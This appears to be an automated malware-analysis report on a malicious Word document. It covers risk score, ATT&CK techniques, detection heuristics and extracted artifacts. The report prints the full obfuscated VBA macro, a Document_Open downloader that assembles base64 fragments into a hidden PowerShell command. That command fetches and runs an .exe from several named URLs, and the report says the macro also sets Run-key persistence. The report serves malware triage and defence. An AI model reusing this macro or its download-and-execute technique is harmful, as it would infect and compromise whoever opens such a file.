MALICIOUS
152
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro that attempts to execute a payload. The script constructs a PowerShell command to download and execute a file from a list of URLs, including 'http://hotel-pushukino.ru/assets/images/StubV2New.exe'. The script also attempts to establish persistence by writing to the registry key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy'.
Heuristics 6
-
ClamAV: Doc.Trojan.Agent-6333895-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Agent-6333895-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell Q64iQtFOf, MU6hzI -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Sub Document_Open() jGYE8Rq9i = "RfLkV4Y2VwdGlvbi5NZXNz" -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2714 bytes |
SHA-256: db6e96e6829fd633a163a7e8fecdba889ef261aa724afeba63b72ec99e6d1008 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
49 of 94 identifiers look randomly generated (e.g. 'TY3JpcHQuU2hlbGw7JHdlYmNsaWVudCA9IG5ldy1') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() jGYE8Rq9i = "RfLkV4Y2VwdGlvbi5NZXNz" Pn2zJ5pCo = "YWdlO31" JgpmiWCjw = "9" P5LsN = jGYE8Rq9i & Pn2zJ5pCo & JgpmiWCjw opjF3bo = "mMucnUvYXNzZXRzL2ltYWdlcy9TdHViVjJOZXcuZXhlLGh0dHA6Ly" L5SNfsuKw = "9pZnRicm9rZXIucnUvYXNzZXRzL2ltYWdlcy9TdHViVjJOZ" M81vnSYdA = "XcuZXhlLGh0dHA6Ly9p" xCxW9b = opjF3bo & L5SNfsuKw & M81vnSYdA vGBopg5t = "cG93ZXJzaGVsbCAtV2luZG93U3R5bGUgSGlkZGVuICR3c" X7eTI4g = "2NyaXB0ID0gbmV3LW9iamVjdCAtQ29tT2JqZWN0IFd" yvyWB = vGBopg5t & X7eTI4g mwvZ2Y7Sc = "skd2ViY2xpZW50LkRvd25sb2FkRmlsZSgkdXJsLlRv" a5yzhMY86 = "U3RyaW5nK" sDTqJ60na = "CksICRwYXRoKTtTdGFydC1Qcm9jZXNzICRwYXRoO2JyZWFrO31jY" FN3WUZ = "XRjaHt3cml0ZS1ob3N0IC" AGxAn = mwvZ2Y7Sc & a5yzhMY86 & sDTqJ60na & FN3WUZ UG1V3B4ba = "TY3JpcHQuU2hlbGw7JHdlYmNsaWVudCA9IG5ldy1vYmplY3QgU3lzdGVtLk5ldC5" RaXAGM2 = "XZWJDbGllbnQ7JHJhbmRvbSA9IG5ldy1vYmplY3QgcmFuZG" jUgvW5 = "9tOyR1cmxz" bDgZJ = UG1V3B4ba & RaXAGM2 & jUgvW5 InfUa = "ID0gJ2h0dHA6Ly9ob3RlbC1wdXNoa2luby5ydS9hc3Nld" gJbKui6Xa = "HM" GCYftc = "vaW1hZ2VzL1N0dWJWMk5ldy5leGUsaHR0cDovL2ktY" sWrx7DaK = InfUa & gJbKui6Xa & GCYftc VnpBR5FY = "zNik7JHBhdGggPSAkZW52OnRlbXA" sLYqTZVDP = "gKyAnXCcgKyAkbmFtZSArICcuZXhl" ciF6HZgrl = "Jztmb3JlYWNoKCR1cmwgaW4gJHVybHMpe3RyeX" nPrBSF = VnpBR5FY & sLYqTZVDP & ciF6HZgrl Aq4wIGL5 = "1YlYyTmV3LmV4ZSc" K2JOQlP4f = "uU3BsaXQoJywnKTskbmFtZSA" rsVSLF3T = "9ICRyYW5kb20ubmV4dCgxLCA2NTU" DfxlBop0W = Aq4wIGL5 & K2JOQlP4f & rsVSLF3T MCgqDbe = "bXBsYWRlbnQucnUvYXNzZXRzL2l" erg5ehGHI = "tYWdlcy9TdHViVjJOZXcuZXhlLGh0" jEn83o1 = "dHA6Ly9pbXB1bHNhdmlhLnJ1L2Fzc2V0cy9pbWFnZXMvU3R" CRFVrhd = MCgqDbe & erg5ehGHI & jEn83o1 V7JnXW = yvyWB & bDgZJ & sWrx7DaK & xCxW9b & CRFVrhd & DfxlBop0W & nPrBSF & AGxAn & P5LsN Call runm(V7JnXW) End Sub Attribute VB_Name = "o79Jl" Sub runm(FgrBzW5hp) KowDvZqH = dnfpbKR(FgrBzW5hp) yeE0j9u. _ titdg KowDvZqH, 0 End Sub Attribute VB_Name = "UKmsWT" Function dnfpbKR(gsy3wCR) As String Set jnbEH2l5B = New MSXML2.DOMDocument Set IwdnHaN = jnbEH2l5B.createElement(E93W28PJ) With IwdnHaN .dataType = "bin.base64" .text = gsy3wCR dnfpbKR = IwdnHaN.nodeTypedValue hxsMZ8 = 21808 / 376 End With Set IwdnHaN = Nothing Set jnbEH2l5B = Nothing End Function Attribute VB_Name = "yeE0j9u" Public Const E93W28PJ = "BASE64" Public Sub titdg(ojCHIa, MU6hzI) Dim Q64iQtFOf As String Q64iQtFOf = StrConv(ojCHIa, 64) Shell Q64iQtFOf, MU6hzI End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.